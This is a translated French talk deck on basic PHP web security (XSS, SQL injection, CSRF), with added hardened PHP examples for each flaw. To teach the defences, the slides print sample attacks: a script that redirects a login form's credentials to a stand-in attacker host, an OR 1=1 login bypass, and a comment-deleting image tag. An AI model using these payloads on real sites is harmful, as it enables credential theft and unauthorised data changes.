
Introduction to web application security with PHP [fr]

6,409 views


Slides from the Web security / PHP talk given at #NWXTECH2 by Maxime Mauchaussée / Wixiweb.
Discover the basic principles of PHP security: SQL injection, XSS and CSRF vulnerabilities, and see how to protect against them simply.

Published in: Technology


  1. Introduction to Web Application / PHP Security. Basic principles: XSS, SQL injection, CSRF. Maxime Mauchaussée, maxime@wixiweb.fr, @maximemdotnet, http://www.wixiweb.fr, @wixiweb
  2. Outline
     - Basic security principles
     - XSS vulnerabilities: definition, examples / exploitation, countermeasures
     - SQL injection vulnerabilities: definition, examples / exploitation, countermeasures
     - CSRF vulnerabilities: definition, examples / exploitation, countermeasures
     - Conclusion
  3. Basic principles
     - Never trust data that does not come from your own code
       - URL parameters, cookies, form data, etc.
       - APIs, import files, databases, etc.
       - Environment variables (user agent, referer, host, etc.)
     - Avoid allowing HTML tags to be entered
       - Use of the <img> tag must be very strictly controlled
       - Forbid dangerous attributes such as "style" and "onload"
     - Never underestimate a vulnerability
       - Any vulnerability can potentially be exploited one day
       - Fix every discovered vulnerability as quickly as possible
  4. XSS vulnerabilities - Definition
     - XSS: Cross Site Scripting
     - "The principle is to inject arbitrary data into a web site [...] If this data reaches the web page sent to the browser as-is, without having been checked, then a vulnerability exists" [Wikipedia]
     - Injection of HTML or JavaScript code
     - The injected content is used to trap a user
  5. XSS vulnerabilities - Basic example. An ordinary web site: (screenshot)
  6. XSS vulnerabilities - Basic example
     PHP view file:

         <form action="recherche.php" method="get">
         <input type="text" name="q" value="<?php echo $_GET['q']; ?>" />
         <input type="submit" value="recherche" />
         </form>

     Data entered and sent to the server:

         "/><script type="text/javascript">alert('faille xss')</script><"

     Compromised HTML returned by the server:

         <input type="text" name="q" value=""/><script type="text/javascript">alert('faille xss')</script><"" />

  7. XSS vulnerabilities - Basic example. "Bam! Watermelon!": (screenshot of the injected alert)
  8. XSS vulnerabilities - Exploitation
     - Damage to the site's image / reputation
     - Automatic redirection
     - Triggering downloads of infected files
     - Credential theft
     - Session hijacking
     - Session fixation
  9. XSS vulnerabilities - Exploit examples
     - Hijacking the "action" attribute of the login form by injection:

           "/><script>document.forms[0].action='http://attaquant.fr/owned.php';</script><"

     - Users will send their credentials to the script chosen by the attacker
     - Possible (sometimes transparent) redirection to the legitimate page
  10. XSS vulnerabilities - Countermeasures
     - Filter / sanitize input data:
       - Every piece of data has a format: length, bounds, etc.
       - filter_var() or filter_input()
       - strip_tags() as a second choice
       - Do not allow HTML tags to be entered
     - And on output:
       - htmlspecialchars()
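The search form of slide 6 next to a version that applies the slide 10 countermeasures (input filtering plus htmlspecialchars() on output). This is an added example, not code from the slides; function names are mine, and filter_var() stands in for filter_input() so that the script runs from the command line where $_GET is empty.

```php
<?php
// Added example (not from the slides): the search form from slide 6 rendered the
// vulnerable way and with the countermeasures from slide 10.
// Run with: php xss_example.php
declare(strict_types=1);

// Vulnerable rendering: the raw query string lands inside an attribute value.
function renderSearchFormVulnerable(string $q): string
{
    return '<form action="recherche.php" method="get">'
        . '<input type="text" name="q" value="' . $q . '" />'
        . '<input type="submit" value="recherche" />'
        . '</form>';
}

// Input filtering (slide 10): the search term has a format, so enforce it.
// Here: plain string, control characters stripped, at most 64 bytes.
// filter_var() is used so the example runs from the CLI; with a real request,
// filter_input(INPUT_GET, 'q', FILTER_UNSAFE_RAW, FILTER_FLAG_STRIP_LOW) is equivalent.
function filterSearchTerm(?string $raw): string
{
    if ($raw === null) {
        return '';
    }
    $q = filter_var($raw, FILTER_UNSAFE_RAW, FILTER_FLAG_STRIP_LOW);
    if ($q === false || strlen($q) > 64) {
        return '';   // reject anything outside the expected format
    }
    return $q;
}

// Output escaping (slide 10): ENT_QUOTES encodes both " and ', which is what
// keeps the value inside the quoted attribute instead of closing it.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderSearchFormSafe(?string $rawQ): string
{
    $q = filterSearchTerm($rawQ);
    return '<form action="recherche.php" method="get">'
        . '<input type="text" name="q" value="' . e($q) . '" />'
        . '<input type="submit" value="recherche" />'
        . '</form>';
}

// The payload from slide 6, as constructed test input (no HTTP request needed).
$payload = '"/><script type="text/javascript">alert(\'faille xss\')</script><"';

echo "Vulnerable:\n", renderSearchFormVulnerable($payload), "\n\n";
echo "Hardened:\n", renderSearchFormSafe($payload), "\n";
// In the hardened output the payload stays inside the attribute as text:
// value="&quot;/&gt;&lt;script ...&gt;...&lt;/script&gt;&lt;&quot;" and no tag is created.
```

Even with filtering in place, the output escaping is the step that actually neutralises the slide 6 payload; filtering alone only narrows what reaches the page.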
  11. SQL injection vulnerabilities - Definition
     - SQL injection: "Term designating the unintended interpretation of SQL code in an application. This code was introduced through an indirect route." [CERTA]
  12. SQL injection vulnerabilities - Example. Authentication bypass: (screenshot)
  13. SQL injection vulnerabilities - Example
     PHP code:

         mysql_query("SELECT id, login, profil FROM user WHERE login = '" . $_POST['login'] . "' AND password = '" . $_POST['password'] . "';");

     Data entered in the "login" field: ' OR 1 = 1 --

     Resulting SQL query built by PHP:

         SELECT id, login, profil FROM user WHERE login = '' OR 1 = 1 --' AND password = ''

  14. SQL injection vulnerabilities - Exploitation
     - "This technique allows [...] a malicious user to modify the database, or to access information not intended for them." [CERTA]
     - Privilege escalation: gaining additional access rights
     - Data theft
     - Data destruction
     - Injection of malicious code
  15. SQL injection vulnerabilities - Countermeasures
     - addslashes()

           SELECT id, login, profil FROM user WHERE login = '\' OR 1 = 1 --' AND password = ''

     - mysql_real_escape_string()
     - Prepared statements
     - Prepared statements > mysql_real_escape_string > addslashes
     - Do not use the SQL "root" account for your application
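The login query of slide 13 rewritten as a prepared statement, the first choice on slide 15, and exercised with the slide's injection string. This is an added example, not the presenter's code; it assumes the pdo_sqlite extension so that it runs offline against an in-memory database (with MySQL only the DSN and credentials change), and the user table and rows are constructed for the demo.

```php
<?php
// Added example (not from the slides): slide 13's login check done with a PDO
// prepared statement instead of string concatenation.
// Run with: php sqli_example.php   (requires pdo_sqlite)
declare(strict_types=1);

function openDemoDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Slide 15: never run the application as the SQL root account. SQLite has no
    // accounts, but with MySQL the DSN user should hold only the grants it needs.
    $pdo->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, login TEXT UNIQUE, password TEXT, profil TEXT)');
    $ins = $pdo->prepare('INSERT INTO user (login, password, profil) VALUES (?, ?, ?)');
    // Constructed rows; passwords stored as salted hashes rather than clear text,
    // which goes one step beyond what the slides show.
    $ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT), 'admin']);
    $ins->execute(['bob', password_hash('battery staple', PASSWORD_DEFAULT), 'user']);
    return $pdo;
}

// The string building from slide 13, kept only to display the SQL text it would
// send. It is never executed in this example.
function buildVulnerableQuery(string $login, string $password): string
{
    return "SELECT id, login, profil FROM user WHERE login = '" . $login
         . "' AND password = '" . $password . "';";
}

// Hardened version: a placeholder keeps user input as data, never as SQL syntax,
// and the password is verified in PHP against the stored hash.
function authenticate(PDO $pdo, string $login, string $password): ?array
{
    $stmt = $pdo->prepare('SELECT id, login, password, profil FROM user WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;   // ['id' => ..., 'login' => ..., 'profil' => ...]
}

$pdo = openDemoDb();

// The injection string from slide 13, as constructed test input.
$injected = "' OR 1 = 1 --";

echo "SQL that the slide 13 code would send:\n", buildVulnerableQuery($injected, ''), "\n\n";

var_dump(authenticate($pdo, 'alice', 'correct horse'));   // array with id, login, profil
var_dump(authenticate($pdo, $injected, ''));              // NULL: the quote is just data
```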
  16. CSRF vulnerabilities - Definition
     - Cross-Site Request Forgery
     - "Injection of illegitimate requests by bounce" [CERTA]
     - "Attack causing the victim to send requests to a vulnerable site, unknowingly and in their own name." [CERTA]
     - Does not necessarily exploit a lack of validation
  17. CSRF vulnerabilities - Basic example. A comment system: (screenshot)
  18. CSRF vulnerabilities - Example
     - A link is provided to delete one of your own comments: http://sitemalfichu.fr/delete_comment?id=2
     - The attacker predicts the identifier of the victim's comment: http://sitemalfichu.fr/delete_comment?id=1
     - The attacker inserts an image tag into a comment: <img src="http://sitemalfichu.fr/delete_comment?id=1" />
     - When the victim loads the page, she deletes her own comment
  19. CSRF vulnerabilities - Exploitation
     - Data deletion: messages, user accounts, etc.
     - Posting messages: disinformation, spam, viruses, etc.
     - Password change
     - Email address change
     - Cheating in contests or polls
  20. CSRF vulnerabilities - Countermeasures
     - Use the HTTP POST method
     - Ban the use of $_REQUEST
     - Set up a token system for the most sensitive actions
     - Forbid HTML tags from being entered
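A minimal token scheme for the delete_comment action of slide 18, following slide 20 (POST only, no $_REQUEST, a per-session token checked on every sensitive action). This is an added example, not code from the slides; the session and the comment store are plain arrays so that the functions run from the command line (in a real application $_SESSION plays that role after session_start()), and all function names are mine.

```php
<?php
// Added example (not from the slides): CSRF protection for slide 18's delete action.
// Run with: php csrf_example.php
declare(strict_types=1);

// One random token per session, generated on first use and reused for its lifetime.
function csrfToken(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Constant-time comparison: hash_equals does not leak how many bytes matched.
function csrfTokenIsValid(array $session, ?string $submitted): bool
{
    return isset($session['csrf_token'])
        && is_string($submitted)
        && hash_equals($session['csrf_token'], $submitted);
}

// The delete form rendered for the comment's owner (slide 18 used a plain GET link).
function renderDeleteForm(array &$session, int $commentId): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<form action="/delete_comment" method="post">'
        . '<input type="hidden" name="id" value="' . $commentId . '" />'
        . '<input type="hidden" name="csrf_token" value="' . $token . '" />'
        . '<input type="submit" value="Supprimer" />'
        . '</form>';
}

// The handler: reads only $_POST (never $_REQUEST), requires the POST method,
// checks the token, and still checks that the comment belongs to the current user.
function handleDeleteComment(string $method, array $post, array $session, array &$comments): string
{
    if ($method !== 'POST') {
        return '405 Method Not Allowed';   // an <img src="..."> can only issue a GET
    }
    if (!csrfTokenIsValid($session, $post['csrf_token'] ?? null)) {
        return '403 Forbidden: invalid CSRF token';
    }
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false || !isset($comments[$id])) {
        return '404 Not Found';
    }
    if ($comments[$id]['owner'] !== ($session['user_id'] ?? null)) {
        return '403 Forbidden: not your comment';
    }
    unset($comments[$id]);
    return '200 Deleted';
}

// Constructed demo data: the victim (user 1) owns comment 1, as in slide 18.
$comments = [1 => ['owner' => 1, 'text' => 'premier'], 2 => ['owner' => 2, 'text' => 'second']];
$victimSession = ['user_id' => 1];

echo renderDeleteForm($victimSession, 1), "\n\n";

// The <img> from slide 18 produces a GET with no token: rejected before anything happens.
echo handleDeleteComment('GET', [], $victimSession, $comments), "\n";
// A forged POST from another origin cannot know the session token: rejected.
echo handleDeleteComment('POST', ['id' => 1, 'csrf_token' => 'guess'], $victimSession, $comments), "\n";
// The legitimate form submission carries the token and succeeds.
echo handleDeleteComment('POST', ['id' => 1, 'csrf_token' => $victimSession['csrf_token']], $victimSession, $comments), "\n";
```

The ownership check is kept deliberately: the token stops requests forged from another site, while the ownership check stops a logged-in user from deleting someone else's comment, and slide 18's attack needs both to be missing.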
  21. Conclusion
     - Never trust data that does not come from your own code
     - Every piece of data has a format: length, bounds, volume, etc.
     - Always filter / sanitize this data on input and on output
     - Fix vulnerabilities as quickly as possible
     - Web application security does not stop there: PHP configuration, web server configuration, network infrastructure, etc.
  22. Questions and answers. Example questions if you have none of your own:
     - How can I detect such vulnerabilities in my application?
     - Can you give other examples of XSS / CSRF attacks?
     - What other good practices can be applied to secure web applications?
     - What is a "blind SQL injection"?
     - Where can I find more information on this topic?
     - Are there other types of vulnerabilities?
  23. Thank you for your attention :) Contact: maxime@wixiweb.fr, https://twitter.com/maximemdotnet, https://identi.ca/maximemdotnet, http://www.wixiweb.fr/
